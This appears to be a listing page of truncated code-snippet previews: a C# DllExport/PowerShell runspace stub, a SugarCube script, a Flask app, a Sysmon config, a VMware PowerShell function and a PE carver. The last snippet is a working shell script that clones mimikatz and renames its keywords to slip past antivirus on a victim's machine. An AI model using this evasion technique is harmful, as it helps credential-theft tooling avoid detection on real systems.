CLICK ME
yes, even hidden code blocks!
print("hello world!")
using System; | |
using System.Text; | |
using System.Text.RegularExpressions; | |
using System.Management.Automation.Runspaces; | |
using System.Runtime.InteropServices; | |
using System.Net; | |
using RGiesecke.DllExport; | |
namespace Export | |
{ |
:: StoryTitle | |
SugarCube i18n example | |
:: Language Switching [script] | |
;(function () { | |
/*********************************************************** | |
Set up an `i18n` object on SugarCube's `setup` object. | |
***********************************************************/ | |
setup.i18n = { |
from flask import Flask, request, jsonify, json, abort | |
from flask_cors import CORS, cross_origin | |
import pandas as pd | |
app = Flask(__name__) | |
cors = CORS(app) | |
app.config['CORS_HEADERS'] = 'Content-Type' |
<Sysmon schemaversion="4.32"> | |
<!-- Capture all hashes --> | |
<HashAlgorithms>*</HashAlgorithms> | |
<DnsLookup>False</DnsLookup> | |
<ArchiveDirectory>Archive</ArchiveDirectory> | |
<EventFiltering> | |
<RuleGroup name="" groupRelation="or"> | |
<!-- Event ID 1 == Process Creation. Log all newly created processes except --> | |
<ProcessCreate onmatch="exclude"> | |
<Image condition="contains">splunk</Image> |
Function New-VMDeploy { | |
[CmdletBinding()] | |
Param() | |
DynamicParam { | |
# Set the dynamic parameters' name | |
$ParamName_portgroup = 'PortGroup' |
#!/usr/bin/env python2 | |
''' | |
Carve PE files from binary data. | |
Write them into the current directory, named after their hash. | |
Example:: | |
$ python carvepe.py unallocated.bin | |
INFO:__main__:found pe at 0x0, length: 0xd8000 | |
INFO:__main__:writing pe file to 273ed32b617fd79ed1b88ebd4521a441.bin |
# This script downloads and slightly "obfuscates" the mimikatz project. | |
# Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "benjamin@gentilkiwi.com" ..., | |
# so removing them from the project before compiling gets us past most of the AV solutions. | |
# We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ...., | |
# but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program. | |
git clone https://github.com/gentilkiwi/mimikatz.git windows | |
mv windows/mimikatz windows/windows | |
find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/windows/g' | |
find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/WINDOWS/g' |
Table of Contents